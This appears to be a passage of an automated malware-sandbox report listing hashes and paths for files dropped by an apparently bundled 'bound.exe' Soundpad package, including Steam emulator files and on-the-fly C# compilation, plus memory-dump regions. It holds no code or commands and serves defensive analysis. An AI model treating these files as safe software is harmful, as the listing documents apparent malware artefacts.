| SHA512 | c206a676dbf7902c6136b6428cea7301249f2e722f8d1d2e4e6e06298c3968b2d348bf3e00b928d5f3c67a127630044a145d3f6939b663deac6c849f7449f0f1 |
memory/2800-49-0x00007FFA02A00000-0x00007FFA02A25000-memory.dmp
memory/2800-56-0x00007FFA02950000-0x00007FFA0297D000-memory.dmp
memory/2800-58-0x00007FFA02910000-0x00007FFA02929000-memory.dmp
memory/2800-60-0x00007FFA027A0000-0x00007FFA027C4000-memory.dmp
memory/2800-62-0x00007FF9F2730000-0x00007FF9F28A6000-memory.dmp
memory/2800-66-0x00007FFA082B0000-0x00007FFA082BD000-memory.dmp
memory/2800-65-0x00007FFA02820000-0x00007FFA02839000-memory.dmp
memory/2800-73-0x00007FF9F2200000-0x00007FF9F2729000-memory.dmp
memory/2800-74-0x000002A804070000-0x000002A804599000-memory.dmp
memory/2800-72-0x00007FF9FE4F0000-0x00007FF9FE5BD000-memory.dmp
memory/2800-71-0x00007FFA027E0000-0x00007FFA02813000-memory.dmp
memory/2800-76-0x00007FFA02400000-0x00007FFA02414000-memory.dmp
memory/2800-78-0x00007FFA02790000-0x00007FFA0279D000-memory.dmp
memory/2800-79-0x00007FF9F2CD0000-0x00007FF9F33A9000-memory.dmp
memory/1192-80-0x00007FF9F1123000-0x00007FF9F1125000-memory.dmp
memory/944-81-0x000001ECF4BD0000-0x000001ECF4BF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fvlypc2q.45z.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2800-103-0x00007FF9EC660000-0x00007FF9EC77B000-memory.dmp
memory/2800-104-0x00007FFA02A00000-0x00007FFA02A25000-memory.dmp
memory/1192-105-0x00007FF9F1120000-0x00007FF9F1BE1000-memory.dmp
memory/1192-102-0x00007FF9F1120000-0x00007FF9F1BE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bound.exe
| MD5 | 3e4277342aab18c9c4774f18c5d09b2a |
| SHA1 | a4029dce435c1989f6b0a6f0da3ed52f5ab97b7f |
| SHA256 | 6363106612cbe65c703eb908cb8696c53d096724f4b0120f2e049f19553f7ead |
| SHA512 | 9e6371fd6760d60927d5ea6ad938ee6d73acfb5c737c18af9e0815d88b0c5b023089159c440781087854d85f4597a850523683f871ca9f0e4f6f8cf60790a2b5 |
memory/3328-109-0x00000000001D0000-0x0000000000226000-memory.dmp
memory/3328-113-0x0000000002310000-0x0000000002334000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3328-119-0x0000000005100000-0x00000000056A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\languages\de\translation.mo
| MD5 | 2e19463d9f8d2192f8fc35febf0eae32 |
| SHA1 | 6a3ce06834376b73e7844aa68154b309dc576bf1 |
| SHA256 | 67c8e7e3be1fc9da05c65053f115e304fa92e510f3732e8f69ca09879c68791b |
| SHA512 | 7ed88bb3e3cf30d48cb990bb6fb4526f00439cdb6219f877ead0242ca92962cf81b989ba6c386374713c29795ad2f64535b1ba41f19f1705c5e895c2011ff593 |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe
| MD5 | 83d098acd73894acf59449a280515652 |
| SHA1 | 80ed24ce504a51f7bad4390d06d902fdfe9e3339 |
| SHA256 | 8d432c758a187cd072040411b31b6ca3004de8daa77d3828e1a98cc4abc68c3e |
| SHA512 | d9c01a826c7374d9b8ecc3d5da7064b0dac84455a50ad0416c2c698bc1510cab6de450267541b41cad45201f69be2ec6b4354b954f6ada011bba510ef67a57cf |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\steam_api64.dll
| MD5 | 99a2cf782112b5ea29cb18674ca3182d |
| SHA1 | 76293671a4d3cad76cfb0d1cef6af1e06c113b5b |
| SHA256 | 9d8165a2b06a26b566a6002f020030dba993d4bc36238001f40eaeb1810c711c |
| SHA512 | 6b07c4da646047bc6169a51f39aa659f2266fe0c6a751e5d69e4e8d7a8a10a3d485085482f0adbd79a9ddd1b227290a2d3d450b332ef6b4b116b98b62c09a594 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2524e72b0573fa94e9cb8089728a4b47 |
| SHA1 | 3d5c4dfd6e7632153e687ee866f8ecc70730a0f1 |
| SHA256 | fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747 |
| SHA512 | 99a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8 |
memory/3668-222-0x00007FF9E5900000-0x00007FF9E6968000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SteamConfig.ini
| MD5 | 3a7332fa15a618feb3977d1bb0ef9028 |
| SHA1 | 702318a43a767aed631b0e738463ec9a70676667 |
| SHA256 | beac3a65818283b10e206f9fb414501984fa32a62f85d9a8615b1994524a41dd |
| SHA512 | 3ea8dd23df4b4ba66ca0e9118acc007e8d16c6de3a7d41823090f90447bfd564f8205b7787dba7b6ddb0415f8b42972ad9332e5f4073008a4cf8513e0c59f3e9 |
memory/1192-201-0x00007FF9F1120000-0x00007FF9F1BE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Profile\VALVE\SteamUserID.cfg
| MD5 | 6494d3a74577e991e71e6794c5c96013 |
| SHA1 | 546c4306cc3b1e17e2aa9c2f6c0617b41cbe9db6 |
| SHA256 | 52a43f31e41a9609b9204dc893497c8ce3c67934701cda05df2c80c4b4e8a0c4 |
| SHA512 | 9bb3579335c212a029cae0010f59f5ca57e4edea87a087f1ef03e9e7b07e18d2d5a2ae1762892f86ba82aa6222dce117cfb42d71cca41ed50aa979452c9630e3 |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe
| MD5 | fe88b70be5691fa4bb7ba946c1f9e39c |
| SHA1 | cf55797f726e067b845b342e5b0fff2514b6057a |
| SHA256 | 29c3b319f3e15df0e453b8d51120484ee272436264a235f590b24aeeb50b006d |
| SHA512 | fb918124d3e0bfafad34b4db89bec18ea6785a15ae8292cd28854c7ae87ca79b035e91742ffb99ff6ad19c56536a9245aa472fda550fa61be9ddda5917fc2188 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9c740b7699e2363ac4ecdf496520ca35 |
| SHA1 | aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9 |
| SHA256 | be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61 |
| SHA512 | 8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\TTS.dll
| MD5 | c9e600a3cffd5e40125ff0ffd3495728 |
| SHA1 | bf35bd0f83f9a6ce4693c8a1e55154c31b2f3120 |
| SHA256 | c9c986730cb78aad3c6c38947e1a998a494dc54ca447cf91de992a81a5ff8bbb |
| SHA512 | e751633199690abebdd3d84ccab53a259a85754f964f84156344915d5a71e3cb66d9641bd645e657802bc87c12e4ad3337c63270c6063ed1a897a679a80e0165 |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\sounds\scream.mp3
| MD5 | 3fd3a3b313d14a4f8db4e979c38f7fc5 |
| SHA1 | 75d00502088a8f545e1b6225d2985f0e806fd5ef |
| SHA256 | d435c1e228e64b5c6883822399026b144827b54d5b06d2ab1df1462710703fc7 |
| SHA512 | 70504de941cda487977a689e6ca2cb46505e92838b083df82a70853f876dbcf6745e42d657e90cf7a9ac5d6d6e43a443e4bef643da950e32f6ab1a30f1c44a8f |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\sounds\cue.mp3
| MD5 | 6048a9609cb4d0a5d2a7d833903d1f75 |
| SHA1 | 1c76f5538c9977dbe2ab0d0e259d049410a43ee5 |
| SHA256 | c27d55a0413a61b5fb3f30628a2a398602405cc68b2e4e26dc7c196419bba0c6 |
| SHA512 | cb4a5389e1f8cf7c702522bf2bd54fbef82ad8417a5d46ef3348a35f4912b70801824eef193efe033902487c9deca37fd29782061857c9390819d381d88eccf1 |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\sounds\firework.mp3
| MD5 | 6b19a6bf2f055cc832a8c3b8a7a520ba |
| SHA1 | 155d3d969d3a87e35c7aef64674baee3e95d2a49 |
| SHA256 | a4d6fe757479e9a99523f654cedfc5f3d062d02e7d5313d96ad5bf77f58713c6 |
| SHA512 | 36a491302001051ba265e201ebdd9b7a637f3eadfa258f60943ce7ab333e6aa4548c448d70874fe3794fc5c5734e3bbdf3789d9e9ab67b64e9d24f1a32c20498 |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\sounds\ba dum tss.mp3
| MD5 | ecfd36db4cd603fe69fb216ec96314f3 |
| SHA1 | e773f5862cae36da5b2c94bd9ba19f6a3b30ae2c |
| SHA256 | 0f346c69f70725b3c0f37d26774fd530d5fc331584a6cfd4eb90857c9be305e5 |
| SHA512 | 644271db61503904fe8a5de3e95e3617f3faf9287862739c929be85e71d8813c30939eb5104072e11dcda71e6f66717077b2e242c33bc7fc49b22fbf5c318673 |
C:\Users\Admin\AppData\Local\speech\Microsoft\Speech\Files\UserLexicons\SP_B259F0CF65624BCF8D0913376078D8C1.dat
| MD5 | 910b499961522fad42241e8b9538b972 |
| SHA1 | 72491183dc161cd9f358ba9ae4d5b64a5ad26900 |
| SHA256 | 515f82dc69ea882a63bdfab599da9f76cd212d92cb96c15c452726a7961c25f6 |
| SHA512 | 378cf12095607bc10624a0915cbed26f5a7dfc3e3f7c1bd9485be2dc8ccf2e9e07b82bcceaf7299e2127bafe35400f01bf53f001d79746fcb0492f8d08cf43aa |
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\UniteFx.dll
| MD5 | d8c8521dc9558dbcfb49cf28d5e648dd |
| SHA1 | f0d7311118af5a3e740f1274825e61967a710ccd |
| SHA256 | a7c5b90e9ebac454c068261f2f6cf05eabe57c80af1a052f0283ba652042f3ad |
| SHA512 | c9dcb2102b027369b7a22b01f12e5848d03ea8ab866c6dfe47c4a7adb4ac9881f167a4df247b708d5c998215c710d593d6d45798af3f76997db810e1fffa80fe |
\??\c:\Users\Admin\AppData\Local\Temp\kaxfwgoa\kaxfwgoa.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\kaxfwgoa\kaxfwgoa.cmdline
| MD5 | 968e0910a7d577e587d6f172023da0a6 |
| SHA1 | 301e33c228a5e7df6c22d798aa7bbebf924fa865 |
| SHA256 | 64da77012776a8025f43245d371efc2d2c72455fda5e02499a4ae511dcb28afb |
| SHA512 | ffe3627f7f296b4d6bfc6b9422c1bbff0f936103b0675b42893aec90c32be1404851b3a16d3bc01f6347a074dd41b7f1e26595fdf272b61f792e272e25ce88a6 |
memory/4400-360-0x000001321F1B0000-0x000001321F1B8000-memory.dmp
memory/2800-417-0x00007FFA027A0000-0x00007FFA027C4000-memory.dmp
memory/2800-413-0x00007FFA02A00000-0x00007FFA02A25000-memory.dmp
memory/2800-418-0x00007FF9F2730000-0x00007FF9F28A6000-memory.dmp
memory/2800-426-0x00007FF9EC660000-0x00007FF9EC77B000-memory.dmp
memory/2800-423-0x00007FF9F2200000-0x00007FF9F2729000-memory.dmp
memory/2800-421-0x00007FFA027E0000-0x00007FFA02813000-memory.dmp
memory/2800-412-0x00007FF9F2CD0000-0x00007FF9F33A9000-memory.dmp
memory/2800-422-0x00007FF9FE4F0000-0x00007FF9FE5BD000-memory.dmp
memory/2800-485-0x00007FF9F2CD0000-0x00007FF9F33A9000-memory.dmp
memory/2800-495-0x00007FF9FE4F0000-0x00007FF9FE5BD000-memory.dmp
memory/2800-494-0x00007FFA027E0000-0x00007FFA02813000-memory.dmp
memory/2800-493-0x00007FFA082B0000-0x00007FFA082BD000-memory.dmp
memory/2800-492-0x00007FFA02820000-0x00007FFA02839000-memory.dmp
memory/2800-491-0x00007FF9F2730000-0x00007FF9F28A6000-memory.dmp
memory/2800-490-0x00007FFA027A0000-0x00007FFA027C4000-memory.dmp
memory/2800-489-0x00007FFA02910000-0x00007FFA02929000-memory.dmp
memory/2800-488-0x00007FFA02950000-0x00007FFA0297D000-memory.dmp
memory/2800-487-0x00007FFA0AD10000-0x00007FFA0AD1F000-memory.dmp
memory/2800-486-0x00007FFA02A00000-0x00007FFA02A25000-memory.dmp
memory/2800-484-0x00007FF9EC660000-0x00007FF9EC77B000-memory.dmp
memory/2800-483-0x00007FFA02790000-0x00007FFA0279D000-memory.dmp
memory/2800-481-0x00007FF9F2200000-0x00007FF9F2729000-memory.dmp
memory/2800-482-0x00007FFA02400000-0x00007FFA02414000-memory.dmp
memory/4724-508-0x00007FF684790000-0x00007FF684888000-memory.dmp
memory/4724-509-0x00007FFA02790000-0x00007FFA027C4000-memory.dmp
memory/4724-510-0x00007FF9F03E0000-0x00007FF9F0696000-memory.dmp
memory/4724-511-0x00007FF9EE9C0000-0x00007FF9EFA70000-memory.dmp